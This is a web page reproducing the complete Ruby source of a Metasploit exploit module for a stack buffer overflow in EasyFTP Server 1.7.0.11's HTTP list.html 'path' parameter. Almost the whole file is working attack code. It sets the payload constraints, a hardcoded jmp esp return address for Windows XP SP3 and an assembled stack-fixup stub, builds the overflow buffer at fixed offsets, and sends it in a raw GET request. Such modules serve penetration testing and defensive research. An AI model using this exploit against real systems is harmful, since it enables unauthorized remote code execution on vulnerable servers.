Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
23780 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }

10


11
  include Msf::Exploit::Remote::HttpClient

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11

20
          and earlier. EasyFTP fails to check input size when parsing the 'path' parameter

21
          supplied to an HTTP GET request, which leads to a stack based buffer overflow.

22
          EasyFTP allows anonymous access by default; valid credentials are typically

23
          unnecessary to exploit this vulnerability.

24


25
          After version 1.7.0.12, this package was renamed "UplusFtp".

26


27
          Due to limited space, as well as difficulties using an egghunter, the use of

28
          staged, ORD, and/or shell payloads is recommended.

29
        },

30
        'Author' => [

31
          'ThE g0bL!N', # Original exploit [see References]

32
          'jduck' # Metasploit re-implementation

33
        ],

34
        'References' => [

35
          [ 'CVE', '2010-20113' ],

36
          [ 'OSVDB', '66614'],

37
          [ 'EDB', '11500' ]

38
        ],

39
        'DefaultOptions' => {

40
          'EXITFUNC' => 'thread'

41
        },

42
        'Privileged' => true,

43
        'Payload' => {

44
          'Space' => 256,

45
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",

46
          'Compat' =>

47
            {

48
              'ConnectionType' => '+ws2ord',

49
            },

50
        },

51
        'Platform' => 'win',

52
        'Targets' => [

53
          [

54
            'Windows XP SP3 - Easy FTP Server Universal',

55
            # NOTE: It's not possible to use addresses within the

56
            # binary due to the nul byte.

57
            {

58
              'Ret' => 0x7cc5d507 # jmp esp in shell32.dll

59
              # 'Ret'      => 0xdeadbeef

60
            }

61
          ]

62
        ],

63
        'DefaultTarget' => 0,

64
        'DisclosureDate' => '2010-02-18',

65
        'Notes' => {

66
          'Reliability' => UNKNOWN_RELIABILITY,

67
          'Stability' => UNKNOWN_STABILITY,

68
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

69
        }

70
      )

71
    )

72


73
    register_options(

74
      [

75
        Opt::RPORT(8080),

76
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),

77
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])

78
      ]

79
    )

80
  end

81


82
  def check

83
    info = http_fingerprint # check method

84
    if info and (info =~ /Easy\-Web Server\//)

85
      return Exploit::CheckCode::Detected

86
    end

87


88
    Exploit::CheckCode::Safe

89
  end

90


91
  def exploit

92
    if (payload.encoded.length > payload_space)

93
      fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")

94
    end

95


96
    # Fix up ESP, jmp to the beginning of the buffer

97
    stub_asm = %q{

98
      mov edi, esp

99
      add esp, 0xfffffc04

100
      add edi, 0xfffffee8

101
      jmp edi

102
    }

103
    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

104


105
    # Build the path up

106
    path = ''

107
    path << payload.encoded

108
    path << rand_text(268 - path.length)

109
    # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.

110
    path << [target.ret].pack('V')

111
    path << rand_text(280 - path.length)

112
    path << stub

113
    path << rand_text(332 - path.length)

114


115
    uri = "/list.html?path="

116
    uri << path

117


118
    print_status("Trying target #{target.name}...")

119
    res = send_request_raw({ 'uri' => uri }, 5)

120


121
    if (res)

122
      print_error("The server unexpectedly responded, this is not good.")

123
      print_status(res.to_s)

124
    end

125


126
    handler

127
  end

128
end

129


130